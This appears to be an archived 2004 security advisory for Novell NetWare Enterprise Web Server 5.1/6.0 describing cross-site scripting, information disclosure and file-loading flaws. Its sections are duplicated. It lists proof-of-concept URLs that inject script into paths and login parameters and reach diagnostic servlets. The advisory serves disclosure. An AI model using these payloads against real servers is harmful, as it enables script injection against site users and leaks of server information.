Novell Netware Enterprise Web Server Multiple Vulnerabilities
BID:9479
Info
Novell Netware Enterprise Web Server Multiple Vulnerabilities
| Bugtraq ID: | 9479 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Jan 23 2004 12:00AM |
| Updated: | Jan 23 2004 12:00AM |
| Credit: | The disclosure of these issues has been credited to Rafel Ivgi, The-Insider <[email protected]>. |
| Vulnerable: |
Novell NetWare Web Server 6.0 Novell NetWare Web Server 5.1 |
| Not Vulnerable: | |
Discussion
Novell Netware Enterprise Web Server Multiple Vulnerabilities
Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server.
Multiple vulnerabilities have been identified in Novell Netware Enterprise Web Server that may allow an attacker to carry out cross-site scripting attacks, disclose sensitive information, and load potentially malicious files on a vulnerable server.
Exploit / POC
Novell Netware Enterprise Web Server Multiple Vulnerabilities
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://www.example.com/perl/<script>alert('XSS')</script>.pl
http://www.example.com/perl/\/.pl
http://www.example.com/servlet/webacc?User.id="><script>alert('XSS')</script>
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>
http://www.example.com/examples/jsp/snp/snoop.jsp
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=<htt file>
http://www.example.com/servlet/SnoopServlet
http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
No exploit is required.
The following proof of concept examples have been provided:
http://www.example.com/perl/\<sCRIPT>alert("d")</sCRIPT>\.pl
http://www.example.com/perl/<script>alert('XSS')</script>.pl
http://www.example.com/perl/\/.pl
http://www.example.com/servlet/webacc?User.id="><script>alert('XSS')</script>
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=login&merge=webacc&action=User.Login&GWAP.ver
sion="><script>alert('XSS')</script>
http://www.example.com/examples/jsp/snp/snoop.jsp
http://www.example.com/servlet/webacc?User.id=&User.password=&User.context=cwqlNomoqd
Oq&User.interface=frames&error=<htt file>
http://www.example.com/servlet/SnoopServlet
http://www.example.com/nsn/"<script%20language=vbscript>msgbox%20sadas</script>".bas
Solution / Fix
Novell Netware Enterprise Web Server Multiple Vulnerabilities
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
Novell Netware Enterprise Web Server Multiple Vulnerabilities
References:
References:
- NetWare-Enterprise-Web-Server/5.1/6.0 Multiple Vulnerabilities ("Rafel Ivgi, The-Insider"
)